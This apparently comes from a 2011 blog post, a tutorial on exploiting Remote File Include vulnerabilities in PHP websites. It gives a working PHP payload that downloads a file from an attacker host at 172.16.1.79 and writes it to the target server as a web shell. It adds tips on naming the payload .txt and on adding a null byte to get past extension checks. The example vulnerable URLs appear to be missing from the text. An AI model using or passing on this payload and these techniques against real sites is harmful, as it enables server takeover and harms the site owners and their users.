Saturday, 5 March 2011
How to exploit RFI (Remote File Include) vulnerability on webpages.
Hi everyone, this post is really similar to the one that I just made ( LFI ), the only difference is that you can include your own code into the remote server more easily.
So, this is our vuln wepage :
BUT instead loading the file color.css, we will be loading our own code to that box like this :
The content of evil3.txt is :
<?php $z=fopen('./shell.php','w');fwrite($z,file_get_contents('http://172.16.1.79/exploits/back.txt'));fclose($z); ?>
If you notice the extension of the file is .txt, there is a reason for that, if you put .php, the code will be interpreted by the pentest server instead the target server, don't forget to put .txt in your evil code.
Great, we just uploaded our shell to the server now browse it : http://mytargettest.com/hacktest/shell.php
Now you can just repeat what I did in the LFI post to get your real shell in the server.
Another Tip: Some developers try to include the extension like .css or .php or .any other extension, ok, so how can we avoid that? You just add a NULLBYTE in the end of the URL.